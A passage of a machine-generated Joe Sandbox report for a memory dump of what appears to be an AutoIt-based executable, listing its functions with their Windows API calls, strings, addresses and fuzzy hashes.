Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 4aad0859f7eba3aaa0d0da165332331f865128d63e2a6bf5a5bb2fdc68d32667
Instruction ID: 547b92154dfde0f752b5dd1b886b7b5cd5feb580c60a6a7a49ad9d69aaaf52f2
Opcode Fuzzy Hash: 4aad0859f7eba3aaa0d0da165332331f865128d63e2a6bf5a5bb2fdc68d32667
Instruction Fuzzy Hash: FC81D171A04209BBDB20BFA4DD42FFEB7A8BF55340F044424FA05AA1D6EB74DA51C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A55A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 00A55A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A55A40
SetWindowTextW.USER32 ref: 00A55A57
GetDlgItem.USER32(?,000003EA), ref: 00A55A6C
SetWindowTextW.USER32 ref: 00A55A72
GetDlgItem.USER32(?,000003E9), ref: 00A55A82
SetWindowTextW.USER32 ref: 00A55A88
SendDlgItemMessageW.USER32 ref: 00A55AA9
SendDlgItemMessageW.USER32 ref: 00A55AC3
GetWindowRect.USER32(?,?), ref: 00A55ACC
_wcslen.LIBCMT ref: 00A55B33
SetWindowTextW.USER32 ref: 00A55B6F
GetDesktopWindow.USER32 ref: 00A55B75
GetWindowRect.USER32(00000000), ref: 00A55B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A55BD3
GetClientRect.USER32 ref: 00A55BE0
PostMessageW.USER32 ref: 00A55C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A55C2F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 6d9b0de7a69b3307c1fd791556f0de37e8624bbf82954af039f764771bd42651
Instruction ID: 2e6375c28767446ce241e942cc551dcf2c379b036ff2a5658e401e41a38434b9
Opcode Fuzzy Hash: 6d9b0de7a69b3307c1fd791556f0de37e8624bbf82954af039f764771bd42651
Instruction Fuzzy Hash: 9F716D31900B05AFDB20DFB8CE99A6EBBF5FF48715F104528E542A25A0E775E948CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A100C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A100C6

Part of subcall function 00A100ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00AC070C,00000FA0,E1103337,?,?,?,?,00A323B3,000000FF), ref: 00A1011C
Part of subcall function 00A100ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A323B3,000000FF), ref: 00A10127
Part of subcall function 00A100ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A323B3,000000FF), ref: 00A10138
Part of subcall function 00A100ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,00A323B3,000000FF), ref: 00A1014E
Part of subcall function 00A100ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,00A323B3,000000FF), ref: 00A1015C
Part of subcall function 00A100ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,00A323B3,000000FF), ref: 00A1016A
Part of subcall function 00A100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A10195
Part of subcall function 00A100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A101A0

___scrt_fastfail.LIBCMT ref: 00A100E7

Part of subcall function 00A100A3: __onexit.LIBCMT ref: 00A100A9

Strings

WakeAllConditionVariable, xrefs: 00A10162
InitializeConditionVariable, xrefs: 00A10148
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A10122
SleepConditionVariableCS, xrefs: 00A10154
kernel32.dll, xrefs: 00A10133

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: a5c42d33a1981f0ef58d34b1323e8ba92f0cf3151eb8fa163fcbccab47b552a4
Instruction ID: e2d689090a389fdaa91655d9ad12858777dd0de0d88915907a3b54612e992d26
Opcode Fuzzy Hash: a5c42d33a1981f0ef58d34b1323e8ba92f0cf3151eb8fa163fcbccab47b552a4
Instruction Fuzzy Hash: A821F932644711FFE710ABE4BD49FAA7394FB04F61F150639F901E6691DBF898818BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A530F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A5318D
_wcslen.LIBCMT ref: 00A531F8

Strings

REGEXPCLASS, xrefs: 00A53255, 00A53266
NAME, xrefs: 00A53335, 00A53346
CLASSNN, xrefs: 00A531F3, 00A53204
TEXT, xrefs: 00A5347C
CLASS, xrefs: 00A53188, 00A531A5
INSTANCE, xrefs: 00A53453

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 507832d08daec4f98d42e5dcf9569403af74a1c316bf52214add11e89360aa66
Instruction ID: 2e933f398d2b878f6dfe51e4760cd03a8d0891068bb6c8c8fc62cefa6aba9f8b
Opcode Fuzzy Hash: 507832d08daec4f98d42e5dcf9569403af74a1c316bf52214add11e89360aa66
Instruction Fuzzy Hash: 1AE1B333A00516AFCF149FB8C4517EDBBB4BF94791F648129E856E7240EB30AE89C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A644C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000), ref: 00A64527
_wcslen.LIBCMT ref: 00A6453B
_wcslen.LIBCMT ref: 00A64599
_wcslen.LIBCMT ref: 00A645F4
_wcslen.LIBCMT ref: 00A6463F
_wcslen.LIBCMT ref: 00A646A7

Part of subcall function 00A0F9F2: _wcslen.LIBCMT ref: 00A0F9FD

GetDriveTypeW.KERNEL32(?,00AB6BF0,00000061), ref: 00A64743

Strings

fixed, xrefs: 00A64635, 00A6463A
unknown, xrefs: 00A64708
ramdisk, xrefs: 00A646F1
cdrom, xrefs: 00A6458F, 00A64594
removable, xrefs: 00A645EA, 00A645EF
all, xrefs: 00A64531, 00A64536
network, xrefs: 00A6469D, 00A646A2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 04a512b238188d4a014075895a983959581455e44333830815d176683c69401f
Instruction ID: db500e45b6acb371dac11b5c4753f40151bb619ae7aff5ff2b56bf78f8834dff
Opcode Fuzzy Hash: 04a512b238188d4a014075895a983959581455e44333830815d176683c69401f
Instruction Fuzzy Hash: 04B1DE756083029FC710EF28C890A7AB7F5AFA9760F50491DF5A6C7291E730DC44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A7B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A7B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A7B1D4
_wcslen.LIBCMT ref: 00A7B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A7B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A7B236
_wcslen.LIBCMT ref: 00A7B332

Part of subcall function 00A605A7: GetStdHandle.KERNEL32(000000F6), ref: 00A605C6

_wcslen.LIBCMT ref: 00A7B34B
_wcslen.LIBCMT ref: 00A7B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A7B3B6
GetLastError.KERNEL32(00000000), ref: 00A7B407
CloseHandle.KERNEL32(?), ref: 00A7B439
CloseHandle.KERNEL32(00000000), ref: 00A7B44A
CloseHandle.KERNEL32(00000000), ref: 00A7B45C
CloseHandle.KERNEL32(00000000), ref: 00A7B46E
CloseHandle.KERNEL32(?), ref: 00A7B4E3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: f54e138d3f16487a6d6a59ba9e75d20209b78ab8c2e0fd9d0a5f5f917aa56f4d
Instruction ID: 892862f65a84b71fe9ae524da82182b8aadd72ebd94273f5cf9242028bc11e1e
Opcode Fuzzy Hash: f54e138d3f16487a6d6a59ba9e75d20209b78ab8c2e0fd9d0a5f5f917aa56f4d
Instruction Fuzzy Hash: 4FF1AC716183049FCB24EF24C891B6EBBE5AF84314F14C55DF9999B2A2DB30EC45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009F326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00AC1990), ref: 00A32F8D
GetMenuItemCount.USER32(00AC1990), ref: 00A3303D
GetCursorPos.USER32(?), ref: 00A33081
SetForegroundWindow.USER32(00000000), ref: 00A3308A
TrackPopupMenuEx.USER32 ref: 00A3309D
PostMessageW.USER32 ref: 00A330A9

Strings

0, xrefs: 009F327D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: a15797ce93e6ddac0ef14af24e4afd438456f9eecfc95e7303547ff3c1f62dd1
Instruction ID: 81455d5fca8a77ea5cc761fbed6dd7a6165d40b3aa4c39086a41053e2e616a0e
Opcode Fuzzy Hash: a15797ce93e6ddac0ef14af24e4afd438456f9eecfc95e7303547ff3c1f62dd1
Instruction Fuzzy Hash: 36712971644209BFEB25DF64CC49FAABF64FF05364F204216F6246A1E1C7B5AD20CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A86CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00A86DEB

Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A

CreateWindowExW.USER32 ref: 00A86E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A86E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A86E94
DestroyWindow.USER32 ref: 00A86EB5
CreateWindowExW.USER32 ref: 00A86EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A86EFD
GetDesktopWindow.USER32 ref: 00A86F16
GetWindowRect.USER32(00000000), ref: 00A86F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A86F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A86F4D

Part of subcall function 00A09944: GetWindowLongW.USER32(?,000000EB), ref: 00A09952

Strings

0, xrefs: 00A86D98
tooltips_class32, xrefs: 00A86E58, 00A86EDD

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 9c8fc0847b1333fb8b3ac409a7f0367374d5fdd5c2b6ca658ef886f7b624654e
Instruction ID: edc82cb30e8528bd4af2d07629c2526f20e4ff0240fb8308836d12ae09a6265a
Opcode Fuzzy Hash: 9c8fc0847b1333fb8b3ac409a7f0367374d5fdd5c2b6ca658ef886f7b624654e
Instruction Fuzzy Hash: AF714874104244AFEB21DF58D848FAABBE9FB89314F44042DFA9987261D774ED06DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00A8911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2

DragQueryPoint.SHELL32(?,?), ref: 00A89147

Part of subcall function 00A87674: ClientToScreen.USER32(?,?), ref: 00A8769A
Part of subcall function 00A87674: GetWindowRect.USER32(?,?), ref: 00A87710
Part of subcall function 00A87674: PtInRect.USER32(?,?,00A88B89), ref: 00A87720

SendMessageW.USER32(?,000000B0,?,?), ref: 00A891B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A891BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A891DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A89225
SendMessageW.USER32(?,000000B0,?,?), ref: 00A8923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00A89255
SendMessageW.USER32(?,000000B1,?,?), ref: 00A89277
DragFinish.SHELL32(?), ref: 00A8927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A89371

Strings

@GUI_DROPID, xrefs: 00A8929E
@GUI_DRAGID, xrefs: 00A892E9
@GUI_DRAGFILE, xrefs: 00A89320

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: ef7fa7ca58cdb99c6eecbceeea0b87d197c082df38e47358a11b592680f19f8c
Instruction ID: 636dbbb72225a79e5461db10300cb11b1f9eff9ef2a82c3dac5b5a45e95735bf
Opcode Fuzzy Hash: ef7fa7ca58cdb99c6eecbceeea0b87d197c082df38e47358a11b592680f19f8c
Instruction Fuzzy Hash: 21615D71108305AFC701EFA4DD85EAFBBE8EFC9750F00092DF596961A1DB709A49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A6C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A6C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A6C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A6C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A6C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A6C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A6C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A6C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A6C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A6C5F0
InternetCloseHandle.WININET(00000000), ref: 00A6C5FB

Strings

, xrefs: 00A6C575

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: e9d4943bac0c99040ff763fa69ee49863f2a10e9480934a261c801ba0bccc62e
Instruction ID: 33df80cbb936be9bed4eb0c385fbc4dbb9560729cec7fd53b9ac1e6abc35db76
Opcode Fuzzy Hash: e9d4943bac0c99040ff763fa69ee49863f2a10e9480934a261c801ba0bccc62e
Instruction Fuzzy Hash: 1D512AB1540708BFDB21DFA4CD88ABA7BBCEB08764F00441AF99696650DB34E9459F60

Uniqueness

Uniqueness Score: -1.00%

Function 00A8856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00A88592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A885A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A885AD
CloseHandle.KERNEL32(00000000), ref: 00A885BA
GlobalLock.KERNEL32 ref: 00A885C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A885D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A885E0
CloseHandle.KERNEL32(00000000), ref: 00A885E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 00A885F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00A8FC38,?), ref: 00A88611
GlobalFree.KERNEL32(00000000), ref: 00A88621
GetObjectW.GDI32(?,00000018,?), ref: 00A88641
CopyImage.USER32 ref: 00A88671
DeleteObject.GDI32(?), ref: 00A88699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A886AF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: bad0cada92480e65805800fc0d2dcbb0f0fe4a8727d6e2ffc20640e1e1f52636
Instruction ID: 1b55839844b8e759b6a3c729979b924bd72ab72c7506aa0d415a65e3d8ae0b1f
Opcode Fuzzy Hash: bad0cada92480e65805800fc0d2dcbb0f0fe4a8727d6e2ffc20640e1e1f52636
Instruction Fuzzy Hash: B341FC75600204AFDB11EFA5DC88EAA7BBDFF89721F104168F905D7250EB349902DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A614BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00A61502
VariantCopy.OLEAUT32(?,?), ref: 00A6150B
VariantClear.OLEAUT32(?), ref: 00A61517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A615FB
VarR8FromDec.OLEAUT32(?,?), ref: 00A61657
VariantInit.OLEAUT32(?), ref: 00A61708
SysFreeString.OLEAUT32(?), ref: 00A6178C
VariantClear.OLEAUT32(?), ref: 00A617D8
VariantClear.OLEAUT32(?), ref: 00A617E7
VariantInit.OLEAUT32(00000000), ref: 00A61823

Strings

Default, xrefs: 00A616AF
%4d%02d%02d%02d%02d%02d, xrefs: 00A61625

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: d28e1a5d43bbd9c86da88546cedd4df4a3308373ea9aebf097b75c6344427594
Instruction ID: 25d7db74bd85e3530b5707c065890973a330f6cae0689c7aed5557fc15a01e2f
Opcode Fuzzy Hash: d28e1a5d43bbd9c86da88546cedd4df4a3308373ea9aebf097b75c6344427594
Instruction Fuzzy Hash: 84D1D072A00219EFDB10DF65E885B79FBB5BF84700F18845AE447AB581EB30EC41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

Part of subcall function 00A7C998: CharUpperBuffW.USER32(?,?), ref: 00A7C9B5
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7C9F1
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA68
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7B6F4
RegOpenKeyExW.ADVAPI32 ref: 00A7B772
RegDeleteValueW.ADVAPI32 ref: 00A7B80A
RegCloseKey.ADVAPI32(?), ref: 00A7B87E
RegCloseKey.ADVAPI32(?), ref: 00A7B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A7B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A7B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 00A7B922
FreeLibrary.KERNEL32(00000000), ref: 00A7B983
RegCloseKey.ADVAPI32(00000000), ref: 00A7B994

Strings

RegDeleteKeyExW, xrefs: 00A7B8FE
advapi32.dll, xrefs: 00A7B8ED

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 5c9affa7fb9150a5051074670c5fd915e63be12d6c8e68b7027df387da110661
